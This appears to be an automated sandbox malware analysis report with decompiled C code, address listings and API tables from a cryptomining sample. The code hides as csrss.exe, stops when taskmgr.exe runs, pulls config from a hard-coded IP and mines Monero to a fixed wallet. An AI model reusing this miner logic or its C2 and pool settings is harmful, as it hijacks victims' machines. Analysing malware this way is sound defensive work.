									_v20 = 0x10;
									_t51 =  &_v56;
									__imp__CryptGetHashParam(_v12, 2, _t51,  &_v20, 0);
									if(_t51 == 0) {
										goto L13;
									} else {
										_t70 = _v20;
										_t75 = 0;
										if(_t70 != 0) {
											_t80 = _a8;
											asm("o16 nop [eax+eax]");
											do {
												_t73 =  *(_t87 + _t75 - 0x34) & 0x000000ff;
												 *((char*)(_t80 + _t75 * 2)) =  *(_t87 + (_t73 >> 4) - 0x24) & 0x000000ff;
												 *((char*)(_t80 + 1 + _t75 * 2)) =  *(_t87 + (_t73 & 0x0000000f) - 0x24) & 0x000000ff;
												_t75 = _t75 + 1;
											} while (_t75 < _t70);
										}
										__imp__CryptDestroyHash(_v12);
										CryptReleaseContext(_v8, 0);
										CloseHandle(_t82);
										return 1;
									}
								}
							}
						} else {
							CloseHandle(_t82);
							CryptReleaseContext(_v8, 0);
							return 0;
						}
					} else {
						CloseHandle(_t82);
						goto L3;
					}
				}
				L20:
			}
























                                                                                                                                          0x035d8b29
                                                                                                                                          0x035d8b30
                                                                                                                                          0x035d8b4b
                                                                                                                                          0x035d8b52
                                                                                                                                          0x035d8b59
                                                                                                                                          0x035d8b60
                                                                                                                                          0x035d8b67
                                                                                                                                          0x035d8b6b
                                                                                                                                          0x035d8b74
                                                                                                                                          0x035d8b79
                                                                                                                                          0x035d8b9b
                                                                                                                                          0x035d8ba1
                                                                                                                                          0x035d8b7b
                                                                                                                                          0x035d8b86
                                                                                                                                          0x035d8b8a
                                                                                                                                          0x035d8b92
                                                                                                                                          0x035d8ba2
                                                                                                                                          0x035d8bb2
                                                                                                                                          0x035d8bba
                                                                                                                                          0x035d8bf0
                                                                                                                                          0x035d8bf4
                                                                                                                                          0x035d8c33
                                                                                                                                          0x035d8c33
                                                                                                                                          0x00000000
                                                                                                                                          0x035d8bf6
                                                                                                                                          0x035d8bf6
                                                                                                                                          0x035d8c00
                                                                                                                                          0x035d8c00
                                                                                                                                          0x035d8c05
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x035d8c14
                                                                                                                                          0x035d8c16
                                                                                                                                          0x035d8c1a
                                                                                                                                          0x035d8c35
                                                                                                                                          0x035d8c38
                                                                                                                                          0x035d8c41
                                                                                                                                          0x035d8c48
                                                                                                                                          0x035d8c4e
                                                                                                                                          0x035d8c56
                                                                                                                                          0x035d8c1c
                                                                                                                                          0x035d8c2d
                                                                                                                                          0x035d8c31
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x035d8c31
                                                                                                                                          0x00000000
                                                                                                                                          0x035d8c1a
                                                                                                                                          0x035d8c59
                                                                                                                                          0x00000000
                                                                                                                                          0x035d8c5b
                                                                                                                                          0x035d8c60
                                                                                                                                          0x035d8c68
                                                                                                                                          0x035d8c71
                                                                                                                                          0x035d8c79
                                                                                                                                          0x00000000
                                                                                                                                          0x035d8c7b
                                                                                                                                          0x035d8c7b
                                                                                                                                          0x035d8c7e
                                                                                                                                          0x035d8c82
                                                                                                                                          0x035d8c84
                                                                                                                                          0x035d8c87
                                                                                                                                          0x035d8c90
                                                                                                                                          0x035d8c90
                                                                                                                                          0x035d8ca2
                                                                                                                                          0x035d8caa
                                                                                                                                          0x035d8cae
                                                                                                                                          0x035d8caf
                                                                                                                                          0x035d8c90
                                                                                                                                          0x035d8cb6
                                                                                                                                          0x035d8cc1
                                                                                                                                          0x035d8cc8
                                                                                                                                          0x035d8cd9
                                                                                                                                          0x035d8cd9
                                                                                                                                          0x035d8c79
                                                                                                                                          0x035d8c59
                                                                                                                                          0x035d8bbc
                                                                                                                                          0x035d8bbd
                                                                                                                                          0x035d8bc8
                                                                                                                                          0x035d8bd4
                                                                                                                                          0x035d8bd4
                                                                                                                                          0x035d8b94
                                                                                                                                          0x035d8b95
                                                                                                                                          0x00000000
                                                                                                                                          0x035d8b95
                                                                                                                                          0x035d8b92
                                                                                                                                          0x00000000

                                                                                                                                          APIs
                                                                                                                                          • CreateFileW.KERNEL32(035D363E,80000000,00000001,00000000,00000003,08000000,00000000), ref: 035D8B6E
                                                                                                                                          • CryptAcquireContextW.ADVAPI32(00000000,00000000,00000000,00000001,F0000000), ref: 035D8B8A
                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 035D8B95
                                                                                                                                          • CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000000), ref: 035D8BB2
                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 035D8BBD
                                                                                                                                          • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 035D8BC8
                                                                                                                                          • ReadFile.KERNEL32(00000000,?,00000400,00000000,00000000,?,00000000), ref: 035D8BF0
                                                                                                                                          • CryptHashData.ADVAPI32(00000000,?,00000000,00000000,?,00000000), ref: 035D8C14
                                                                                                                                          • ReadFile.KERNEL32(00000000,?,00000400,00000000,00000000,?,00000000), ref: 035D8C2D
                                                                                                                                          • CryptReleaseContext.ADVAPI32(00000000,00000000,?,00000000), ref: 035D8C38
                                                                                                                                          • CryptDestroyHash.ADVAPI32(00000000,?,00000000), ref: 035D8C41
                                                                                                                                          • CloseHandle.KERNEL32(00000000,?,00000000), ref: 035D8C48
                                                                                                                                          • CryptGetHashParam.ADVAPI32(00000000,00000002,?,00000000,00000000,?,00000000), ref: 035D8C71
                                                                                                                                          • CryptDestroyHash.ADVAPI32(00000000,?,00000000), ref: 035D8CB6
                                                                                                                                          • CryptReleaseContext.ADVAPI32(00000000,00000000,?,00000000), ref: 035D8CC1
                                                                                                                                          • CloseHandle.KERNEL32(00000000,?,00000000), ref: 035D8CC8
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000006.00000002.469184983.00000000035D0000.00000040.00000001.sdmp, Offset: 035D0000, based on PE: true
                                                                                                                                          Yara matches
                                                                                                                                          Similarity
                                                                                                                                          • API ID: Crypt$Hash$CloseContextHandle$FileRelease$CreateDestroyRead$AcquireDataParam
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 2794010843-0
                                                                                                                                          • Opcode ID: 7cc4bd4bf0c29837b73926786d0d83d0e72fbd7b4eaf1bf00a7cbab7ed9f6b83
                                                                                                                                          • Instruction ID: 6500646ddeac4e78d08998d14875638529b2d4b14bc806f4a89a628d8404c66c
                                                                                                                                          • Opcode Fuzzy Hash: 7cc4bd4bf0c29837b73926786d0d83d0e72fbd7b4eaf1bf00a7cbab7ed9f6b83
                                                                                                                                          • Instruction Fuzzy Hash: D4519371A02218BBEB30EBA4FD45FEDBBB8EF04701F1400A5FA04F51A0D771665A9B64
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Function 035D4470, Relevance: 79.2, APIs: 28, Strings: 17, Instructions: 457synchronizationCOMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          C-Code - Quality: 93%
                                                                                                                                          			_entry_() {
				struct _SECURITY_ATTRIBUTES* _v8;
				struct _SECURITY_ATTRIBUTES* _v12;
				intOrPtr _v16;
				char _v20;
				int _v24;
				struct _SECURITY_ATTRIBUTES* _v28;
				long _v32;
				long _v36;
				char _v38;
				short _v40;
				char _v48;
				char _v72;
				char _v592;
				char _v1112;
				char _v2136;
				char _v3160;
				void _v7224;
				long _t56;
				long _t66;
				void* _t72;
				void* _t74;
				void* _t75;
				void* _t76;
				void* _t77;
				void* _t82;
				void* _t84;
				void* _t89;
				void* _t90;
				void* _t91;
				intOrPtr _t93;
				void* _t94;
				long _t96;
				long _t99;
				void* _t102;
				char _t110;
				char _t114;
				char _t117;
				char _t119;
				void* _t125;
				void* _t137;
				void* _t139;
				void* _t140;
				signed int _t148;
				char _t150;
				void* _t153;
				void* _t158;
				intOrPtr _t160;
				struct _SECURITY_ATTRIBUTES* _t161;
				void* _t166;
				struct _SECURITY_ATTRIBUTES* _t168;
				intOrPtr _t169;
				void* _t171;
				void* _t174;
				void* _t175;
				void* _t176;
				void* _t177;
				void* _t178;
				void* _t179;
				void* _t180;
				void* _t181;
				void* _t182;
				void* _t183;
				void* _t185;
				void* _t186;
				void* _t187;
				void* _t188;
				void* _t189;
				void* _t196;
				void* _t223;
				void* _t225;
				void* _t226;
				void* _t234;

				_v8 = 0;
				_v12 = 0;
				_v28 = 0;
				_t56 = GetTickCount();
				_t150 = 0;
				_v32 = _t56;
				_v36 = _t56;
				_v24 = 0;
				 *0x37a2df4 = 0;
				E035D1670(0x37a2128, 0, 0xcc8);
				asm("xorps xmm0, xmm0");
				asm("movq [ebp-0x10], xmm0");
				E035D1BB0( &_v7224, 0, 0xfe0);
				memcpy("48QbPZUtWm8gG6T6eg6H7JGXaD6eNJH8o3RoyLgBeqym7TxydU9TfMfUUgaheqa7BFdhtfb9d665CgYDj6f5KvdjLeGJmdW",  &_v7224, 0x3f8 << 2);
				_t152 = 0;
				SetErrorMode(SetErrorMode(2) | 0x00000002);
				E035D17E0(0x37a206c, "e9c1286a28d82a2d0ee6");
				_t174 = _t171 + 0x2c;
				if(CreateMutexA(0, 0, 0x37a206c) == 0) {
					ExitProcess(0x1e);
				}
				_t158 = GetLastError;
				_t66 = GetLastError();
				_t191 = _t66 - 0xb7;
				if(_t66 == 0xb7) {
					ExitProcess(0x1f);
				}
				E035D3220(0, SetErrorMode, _t191);
				_t166 = CommandLineToArgvW(GetCommandLineW(),  &_v24);
				if(_t166 != 0 && _v24 > 1) {
					_t148 = E035D19C0( *((intOrPtr*)(_t166 + 4)), L"--show-window");
					_t174 = _t174 + 8;
					asm("sbb eax, eax");
					 *0x37a1bb8 =  *0x37a1bb8 &  ~_t148;
				}
				LocalFree(_t166);
				_t72 = E035D1000(_t152, _t158, _t166,  *0x37a1314);
				_t175 = _t174 + 4;
				_t195 = _t72;
				if(_t72 != 0) {
					E035D8070(_t152, _t195, "d06ed635-68f6-4e9a-955c-4899f5f57b9a");
					_t176 = _t175 + 4;
					_t196 =  *0x37a1bc0 - _t150; // 0x0
					if(_t196 != 0) {
						E035D17E0("48QbPZUtWm8gG6T6eg6H7JGXaD6eNJH8o3RoyLgBeqym7TxydU9TfMfUUgaheqa7BFdhtfb9d665CgYDj6f5KvdjLeGJmdW", "d06ed635-68f6-4e9a-955c-4899f5f57b9a");
						_t176 = _t176 + 8;
					}
					_t74 = E035D1600(0x37a204c, "LKBNMTFJgl");
					_t177 = _t176 + 8;
					if(_t74 != 0) {
						_t75 = E035D1600("csrss.exe", "csrss.exe");
						_t178 = _t177 + 8;
						if(_t75 != 0) {
							_t76 = E035D1600("viTRMUuKeV", "viTRMUuKeV");
							_t179 = _t178 + 8;
							if(_t76 != 0) {
								_t77 = E035D7FA0(_t152, "C:\ProgramData\LKBNMTFJgl", 0x35daae0, 0x23);
								_t180 = _t179 + 0xc;
								if(_t77 != 0) {
									E035D1970("C:\ProgramData\LKBNMTFJgl", "\\");
									E035D1970("C:\ProgramData\LKBNMTFJgl", 0x37a204c);
									_t181 = _t180 + 0x10;
									if(CreateDirectoryW(?str?, 0) != 0 || GetLastError() == 0xb7) {
										if(E035D8DD0() != 0 &&  *0x37a210c == 1) {
											 *0x37a211c = CreateThread(0, 0, E035D8450, 0, 0, 0);
										}
										_t82 = E035D17B0("FALSE", "http://45.144.225.135/config.txt");
										_t182 = _t181 + 8;
										if(_t82 == 0) {
											L33:
											_t84 = E035D3150( &_v1112);
											_t183 = _t182 + 4;
											if(_t84 != 0) {
												E035D30B0( &_v1112,  &_v2136,  &_v3160);
												__imp__SetThreadExecutionState(0x80000041, 0);
												_t89 = E035D3CA0(_t152, _t153, 1, "pool.supportxmr.com:3333", "48QbPZUtWm8gG6T6eg6H7JGXaD6eNJH8o3RoyLgBeqym7TxydU9TfMfUUgaheqa7BFdhtfb9d665CgYDj6f5KvdjLeGJmdW", 0x37a12c0,  *0x37a131c);
												_t185 = _t183 + 0x24;
												if(_t89 == 0) {
													L91:
													ExitProcess(0x3d);
												}
												_t90 = E035D3CA0(_t152, _t153, 0, "pool.supportxmr.com:3333", "48QbPZUtWm8gG6T6eg6H7JGXaD6eNJH8o3RoyLgBeqym7TxydU9TfMfUUgaheqa7BFdhtfb9d665CgYDj6f5KvdjLeGJmdW", 0x37a12c0,  *0x37a131c);
												_t186 = _t185 + 0x14;
												if(_t90 == 0) {
													goto L91;
												}
												L38:
												while(1) {
													if( *0x37a1300 != 0) {
														_t169 = _v28;
														if(_t169 == 0) {
															_t96 = GetTickCount();
															_t215 = _t96 - _v36 - 0x4e20;
															if(_t96 - _v36 > 0x4e20) {
																E035D65D0(_t215);
																_t170 =  !=  ? 1 : _t169;
																_v28 =  !=  ? 1 : _t169;
															}
														}
													}
													if( *0x37a1308 == 3) {
														_t160 =  *0x37a1310; // 0x7530
														_t161 = _t160 + 1;
														__eflags = _t161;
													} else {
														_t161 = E035D8040();
													}
													_t91 = E035D8A50(_t150);
													_t187 = _t186 + 4;
													_t168 =  ==  ? 1 : _t91;
													if( *0x37a1304 == 0) {
														_t93 = _v12;
													} else {
														_t93 = E035D7EF0("taskmgr.exe");
														_t187 = _t187 + 4;
														_v12 = _t93;
													}
													if(_t150 == 0 || _t168 == 0) {
														if(_t93 != 0) {
															goto L58;
														}
														_t223 =  *0x37a1320 - _t93; // 0x0
														if(_t223 != 0 ||  *0x37a2110 != _t93) {
															goto L58;
														} else {
															_t225 = _t161 -  *0x37a1310; // 0x7530
															if(_t225 <= 0) {
																__eflags =  *0x37a1308;
																if( *0x37a1308 != 0) {
																	_t117 = E035D3050(_t150, _t152,  &_v2136, 0);
																	_t187 = _t187 + 8;
																	_t150 = _t117;
																	_t168 = 1;
																}
																_v8 = 0;
																goto L68;
															}
															_t119 = E035D3050(_t150, _t152,  &_v3160, _t93);
															_t187 = _t187 + 8;
															_v8 = 1;
															_t150 = _t119;
															_t168 = 1;
															goto L59;
														}
													} else {
														L58:
														__eflags = _v8;
														if(_v8 == 0) {
															L68:
															_t234 = _t161 -  *0x37a1310; // 0x7530
															if(_t234 <= 0) {
																L75:
																__eflags = _v12;
																if(_v12 == 0) {
																	L77:
																	if( *0x37a1320 == 0) {
																		L79:
																		if( *0x37a2110 == 0) {
																			L82:
																			_t94 = E035D17B0("FALSE", "http://45.144.225.135/config.txt");
																			_t186 = _t187 + 8;
																			if(_t94 != 0) {
																				_t99 = GetTickCount();
																				_t152 =  *0x37a1bb4 * 0xea60;
																				_t245 = _t99 - _v32 -  *0x37a1bb4 * 0xea60;
																				if(_t99 - _v32 >  *0x37a1bb4 * 0xea60) {
																					_v32 = GetTickCount();
																					_t102 = E035D4DE0(_t152, _t153, _t245, "http://45.144.225.135/config.txt", "FALSE", 0x37a2128, _t150, _t168);
																					_t186 = _t186 + 0x14;
																					if(_t102 != 0) {
																						if(E035D39B0(_t153) != 0) {
																							if(_t168 != 0) {
																								E035D8730(_t150);
																								_t186 = _t186 + 4;
																							}
																							E035D3CA0(_t152, _t153, 1, "pool.supportxmr.com:3333", "48QbPZUtWm8gG6T6eg6H7JGXaD6eNJH8o3RoyLgBeqym7TxydU9TfMfUUgaheqa7BFdhtfb9d665CgYDj6f5KvdjLeGJmdW", 0x37a12c0,  *0x37a131c);
																							E035D3CA0(_t152, _t153, 0, "pool.supportxmr.com:3333", "48QbPZUtWm8gG6T6eg6H7JGXaD6eNJH8o3RoyLgBeqym7TxydU9TfMfUUgaheqa7BFdhtfb9d665CgYDj6f5KvdjLeGJmdW", 0x37a12c0,  *0x37a131c);
																							_t186 = _t186 + 0x28;
																						}
																						E035D3B50(_t153, _v20, _v16);
																						_t186 = _t186 + 8;
																					}
																				}
																			}
																			Sleep(0xfa0);
																			continue;
																		}
																		L80:
																		if(_t168 == 0) {
																			goto L82;
																		}
																		L81:
																		E035D8730(_t150);
																		_t187 = _t187 + 4;
																		_t168 = 0;
																		goto L82;
																	}
																	L78:
																	if(_t168 != 0) {
																		goto L81;
																	}
																	goto L79;
																}
																L76:
																__eflags = _t168;
																if(_t168 != 0) {
																	goto L81;
																}
																goto L77;
															}
															if(_v12 != 0) {
																goto L76;
															}
															if( *0x37a1320 != 0) {
																goto L78;
															}
															if( *0x37a2110 != 0) {
																goto L80;
															}
															if(_t168 != 0) {
																E035D8730(_t150);
																_t187 = _t187 + 4;
															}
															_t110 = E035D3050(_t150, _t152,  &_v3160, 0);
															_t187 = _t187 + 8;
															_v8 = 1;
															_t150 = _t110;
															_t168 = 1;
															goto L77;
														}
														L59:
														_t226 = _t161 -  *0x37a1310; // 0x7530
														if(_t226 > 0) {
															goto L75;
														}
														if(_v12 != 0) {
															goto L76;
														}
														if( *0x37a1320 != 0) {
															goto L78;
														}
														if( *0x37a2110 != 0) {
															goto L80;
														}
														if(_t168 != 0) {
															E035D8730(_t150);
															_t187 = _t187 + 4;
															_t168 = 0;
														}
														if( *0x37a1308 != 0) {
															_t114 = E035D3050(_t150, _t152,  &_v2136, 0);
															_t187 = _t187 + 8;
															_t150 = _t114;
															_t168 = 1;
														}
														_v8 = 0;
														goto L68;
													}
												}
											}
											ExitProcess(0x1c);
										} else {
											asm("movq xmm0, [0x37a206c]");
											_v40 =  *0x37a2074;
											asm("movq [ebp-0x2c], xmm0");
											_v38 = _t150;
											E035D1A00( &_v592, "C:\ProgramData\LKBNMTFJgl");
											_t125 = E035D1600( &_v72,  &_v48);
											_t183 = _t182 + 0x10;
											if(_t125 == 0) {
												ExitProcess(0x2f);
											}
											E035D1970( &_v592, "\\");
											E035D1970( &_v592,  &_v72);
											E035D1970( &_v592, "_");
											E035D1970( &_v592, L"3.1.0");
											_t188 = _t183 + 0x20;
											_t137 =  *0x37a10b8( &_v592,  &_v20, 0, 0);
											_t207 = _t137 - 1;
											if(_t137 == 1) {
												_t139 = E035D37E0(_t207,  &_v592);
												_t189 = _t188 + 4;
												_t208 = _t139;
												if(_t139 != 0) {
													E035D39B0(_t153);
													_push(_v16);
													E035D3680(_t153, _v20);
													_t189 = _t189 + 8;
												}
												_t140 = E035D4DE0(_t152, _t153, _t208, "http://45.144.225.135/config.txt", "FALSE", 0x37a2128, 0, 0);
												_t182 = _t189 + 0x14;
												if(_t140 != 0) {
													E035D39B0(_t153);
													E035D3B50(_t153, _v20, _v16);
													_t182 = _t182 + 8;
												}
												goto L33;
											}
											ExitProcess(0x3c);
										}
									} else {
										ExitProcess(0x32);
									}
								}
								ExitProcess(0x31);
							}
							ExitProcess(0x30);
						}
						ExitProcess(0x30);
					} else {
						ExitProcess(0x30);
					}
				}
				ExitProcess(0x3b);
			}











































































                                                                                                                                          0x035d447e
                                                                                                                                          0x035d4481
                                                                                                                                          0x035d4484
                                                                                                                                          0x035d4487
                                                                                                                                          0x035d448d
                                                                                                                                          0x035d448f
                                                                                                                                          0x035d449d
                                                                                                                                          0x035d44a0
                                                                                                                                          0x035d44a3
                                                                                                                                          0x035d44a9
                                                                                                                                          0x035d44b9
                                                                                                                                          0x035d44be
                                                                                                                                          0x035d44c3
                                                                                                                                          0x035d44db
                                                                                                                                          0x035d44db
                                                                                                                                          0x035d44eb
                                                                                                                                          0x035d44f7
                                                                                                                                          0x035d44fc
                                                                                                                                          0x035d450e
                                                                                                                                          0x035d4512
                                                                                                                                          0x035d4512
                                                                                                                                          0x035d4518
                                                                                                                                          0x035d451e
                                                                                                                                          0x035d4520
                                                                                                                                          0x035d4525
                                                                                                                                          0x035d4529
                                                                                                                                          0x035d4529
                                                                                                                                          0x035d452f
                                                                                                                                          0x035d4545
                                                                                                                                          0x035d4549
                                                                                                                                          0x035d4559
                                                                                                                                          0x035d455e
                                                                                                                                          0x035d4563
                                                                                                                                          0x035d4565
                                                                                                                                          0x035d4565
                                                                                                                                          0x035d456c
                                                                                                                                          0x035d4578
                                                                                                                                          0x035d457d
                                                                                                                                          0x035d4580
                                                                                                                                          0x035d4582
                                                                                                                                          0x035d4591
                                                                                                                                          0x035d4596
                                                                                                                                          0x035d4599
                                                                                                                                          0x035d459f
                                                                                                                                          0x035d45ab
                                                                                                                                          0x035d45b0
                                                                                                                                          0x035d45b0
                                                                                                                                          0x035d45bd
                                                                                                                                          0x035d45c2
                                                                                                                                          0x035d45c7
                                                                                                                                          0x035d45db
                                                                                                                                          0x035d45e0
                                                                                                                                          0x035d45e5
                                                                                                                                          0x035d45f9
                                                                                                                                          0x035d45fe
                                                                                                                                          0x035d4603
                                                                                                                                          0x035d4619
                                                                                                                                          0x035d461e
                                                                                                                                          0x035d4623
                                                                                                                                          0x035d4637
                                                                                                                                          0x035d4646
                                                                                                                                          0x035d464b
                                                                                                                                          0x035d465d
                                                                                                                                          0x035d4677
                                                                                                                                          0x035d4697
                                                                                                                                          0x035d4697
                                                                                                                                          0x035d46a6
                                                                                                                                          0x035d46ab
                                                                                                                                          0x035d46b0
                                                                                                                                          0x035d47b8
                                                                                                                                          0x035d47bf
                                                                                                                                          0x035d47c4
                                                                                                                                          0x035d47c9
                                                                                                                                          0x035d47f2
                                                                                                                                          0x035d47ff
                                                                                                                                          0x035d481c
                                                                                                                                          0x035d4821
                                                                                                                                          0x035d4826
                                                                                                                                          0x035d4af0
                                                                                                                                          0x035d4af2
                                                                                                                                          0x035d4af2
                                                                                                                                          0x035d4843
                                                                                                                                          0x035d4848
                                                                                                                                          0x035d484d
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x035d4853
                                                                                                                                          0x035d485f
                                                                                                                                          0x035d4861
                                                                                                                                          0x035d4866
                                                                                                                                          0x035d4868
                                                                                                                                          0x035d4871
                                                                                                                                          0x035d4876
                                                                                                                                          0x035d4878
                                                                                                                                          0x035d487f
                                                                                                                                          0x035d4882
                                                                                                                                          0x035d4882
                                                                                                                                          0x035d4876
                                                                                                                                          0x035d4866
                                                                                                                                          0x035d488c
                                                                                                                                          0x035d4897
                                                                                                                                          0x035d489d
                                                                                                                                          0x035d489d
                                                                                                                                          0x035d488e
                                                                                                                                          0x035d4893
                                                                                                                                          0x035d4893
                                                                                                                                          0x035d489f
                                                                                                                                          0x035d48a6
                                                                                                                                          0x035d48b1
                                                                                                                                          0x035d48bb
                                                                                                                                          0x035d48cf
                                                                                                                                          0x035d48bd
                                                                                                                                          0x035d48c2
                                                                                                                                          0x035d48c7
                                                                                                                                          0x035d48ca
                                                                                                                                          0x035d48ca
                                                                                                                                          0x035d48d4
                                                                                                                                          0x035d48dc
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x035d48de
                                                                                                                                          0x035d48e4
                                                                                                                                          0x00000000
                                                                                                                                          0x035d48ee
                                                                                                                                          0x035d48ee
                                                                                                                                          0x035d48f4
                                                                                                                                          0x035d4916
                                                                                                                                          0x035d491d
                                                                                                                                          0x035d4928
                                                                                                                                          0x035d492d
                                                                                                                                          0x035d4930
                                                                                                                                          0x035d4932
                                                                                                                                          0x035d4932
                                                                                                                                          0x035d4937
                                                                                                                                          0x00000000
                                                                                                                                          0x035d4937
                                                                                                                                          0x035d48fe
                                                                                                                                          0x035d4903
                                                                                                                                          0x035d4906
                                                                                                                                          0x035d490d
                                                                                                                                          0x035d490f
                                                                                                                                          0x00000000
                                                                                                                                          0x035d490f
                                                                                                                                          0x035d4940
                                                                                                                                          0x035d4940
                                                                                                                                          0x035d4940
                                                                                                                                          0x035d4944
                                                                                                                                          0x035d49ab
                                                                                                                                          0x035d49ab
                                                                                                                                          0x035d49b1
                                                                                                                                          0x035d49f9
                                                                                                                                          0x035d49f9
                                                                                                                                          0x035d49fd
                                                                                                                                          0x035d4a03
                                                                                                                                          0x035d4a0a
                                                                                                                                          0x035d4a10
                                                                                                                                          0x035d4a17
                                                                                                                                          0x035d4a28
                                                                                                                                          0x035d4a32
                                                                                                                                          0x035d4a37
                                                                                                                                          0x035d4a3c
                                                                                                                                          0x035d4a48
                                                                                                                                          0x035d4a4a
                                                                                                                                          0x035d4a57
                                                                                                                                          0x035d4a59
                                                                                                                                          0x035d4a72
                                                                                                                                          0x035d4a75
                                                                                                                                          0x035d4a7a
                                                                                                                                          0x035d4a7f
                                                                                                                                          0x035d4a88
                                                                                                                                          0x035d4a8c
                                                                                                                                          0x035d4a8f
                                                                                                                                          0x035d4a94
                                                                                                                                          0x035d4a94
                                                                                                                                          0x035d4aae
                                                                                                                                          0x035d4aca
                                                                                                                                          0x035d4acf
                                                                                                                                          0x035d4acf
                                                                                                                                          0x035d4ad8
                                                                                                                                          0x035d4add
                                                                                                                                          0x035d4add
                                                                                                                                          0x035d4a7f
                                                                                                                                          0x035d4a59
                                                                                                                                          0x035d4ae5
                                                                                                                                          0x00000000
                                                                                                                                          0x035d4ae5
                                                                                                                                          0x035d4a19
                                                                                                                                          0x035d4a1b
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x035d4a1d
                                                                                                                                          0x035d4a1e
                                                                                                                                          0x035d4a23
                                                                                                                                          0x035d4a26
                                                                                                                                          0x00000000
                                                                                                                                          0x035d4a26
                                                                                                                                          0x035d4a0c
                                                                                                                                          0x035d4a0e
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x035d4a0e
                                                                                                                                          0x035d49ff
                                                                                                                                          0x035d49ff
                                                                                                                                          0x035d4a01
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x035d4a01
                                                                                                                                          0x035d49b7
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x035d49c0
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x035d49c9
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x035d49cd
                                                                                                                                          0x035d49d0
                                                                                                                                          0x035d49d5
                                                                                                                                          0x035d49d5
                                                                                                                                          0x035d49e1
                                                                                                                                          0x035d49e6
                                                                                                                                          0x035d49e9
                                                                                                                                          0x035d49f0
                                                                                                                                          0x035d49f2
                                                                                                                                          0x00000000
                                                                                                                                          0x035d49f2
                                                                                                                                          0x035d4946
                                                                                                                                          0x035d4946
                                                                                                                                          0x035d494c
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x035d4956
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x035d4963
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x035d4970
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x035d4978
                                                                                                                                          0x035d497b
                                                                                                                                          0x035d4980
                                                                                                                                          0x035d4983
                                                                                                                                          0x035d4983
                                                                                                                                          0x035d498c
                                                                                                                                          0x035d4997
                                                                                                                                          0x035d499c
                                                                                                                                          0x035d499f
                                                                                                                                          0x035d49a1
                                                                                                                                          0x035d49a1
                                                                                                                                          0x035d49a8
                                                                                                                                          0x00000000
                                                                                                                                          0x035d49a8
                                                                                                                                          0x035d48d4
                                                                                                                                          0x035d4853
                                                                                                                                          0x035d47cd
                                                                                                                                          0x035d46b6
                                                                                                                                          0x035d46bc
                                                                                                                                          0x035d46c4
                                                                                                                                          0x035d46d4
                                                                                                                                          0x035d46d9
                                                                                                                                          0x035d46dc
                                                                                                                                          0x035d46e9
                                                                                                                                          0x035d46ee
                                                                                                                                          0x035d46f3
                                                                                                                                          0x035d47d5
                                                                                                                                          0x035d47d5
                                                                                                                                          0x035d4705
                                                                                                                                          0x035d4715
                                                                                                                                          0x035d4726
                                                                                                                                          0x035d4737
                                                                                                                                          0x035d473c
                                                                                                                                          0x035d474e
                                                                                                                                          0x035d4754
                                                                                                                                          0x035d4756
                                                                                                                                          0x035d4767
                                                                                                                                          0x035d476c
                                                                                                                                          0x035d476f
                                                                                                                                          0x035d4771
                                                                                                                                          0x035d4773
                                                                                                                                          0x035d4778
                                                                                                                                          0x035d477e
                                                                                                                                          0x035d4783
                                                                                                                                          0x035d4783
                                                                                                                                          0x035d4799
                                                                                                                                          0x035d479e
                                                                                                                                          0x035d47a3
                                                                                                                                          0x035d47a5
                                                                                                                                          0x035d47b0
                                                                                                                                          0x035d47b5
                                                                                                                                          0x035d47b5
                                                                                                                                          0x00000000
                                                                                                                                          0x035d47a3
                                                                                                                                          0x035d475a
                                                                                                                                          0x035d475a
                                                                                                                                          0x035d4668
                                                                                                                                          0x035d466a
                                                                                                                                          0x035d466a
                                                                                                                                          0x035d465d
                                                                                                                                          0x035d4627
                                                                                                                                          0x035d4627
                                                                                                                                          0x035d4607
                                                                                                                                          0x035d4607
                                                                                                                                          0x035d45e9
                                                                                                                                          0x035d45c9
                                                                                                                                          0x035d45cb
                                                                                                                                          0x035d45cb
                                                                                                                                          0x035d45c7
                                                                                                                                          0x035d4586

                                                                                                                                          APIs
                                                                                                                                          • GetTickCount.KERNEL32 ref: 035D4487
                                                                                                                                          • SetErrorMode.KERNEL32(00000002), ref: 035D44E5
                                                                                                                                          • SetErrorMode.KERNEL32(00000000), ref: 035D44EB
                                                                                                                                          • CreateMutexA.KERNEL32(00000000,00000000,037A206C), ref: 035D4506
                                                                                                                                          • ExitProcess.KERNEL32 ref: 035D4512
                                                                                                                                          • GetLastError.KERNEL32 ref: 035D451E
                                                                                                                                          • ExitProcess.KERNEL32 ref: 035D4529
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000006.00000002.469184983.00000000035D0000.00000040.00000001.sdmp, Offset: 035D0000, based on PE: true
                                                                                                                                          Yara matches
                                                                                                                                          Similarity
                                                                                                                                          • API ID: Error$ExitModeProcess$CountCreateLastMutexTick
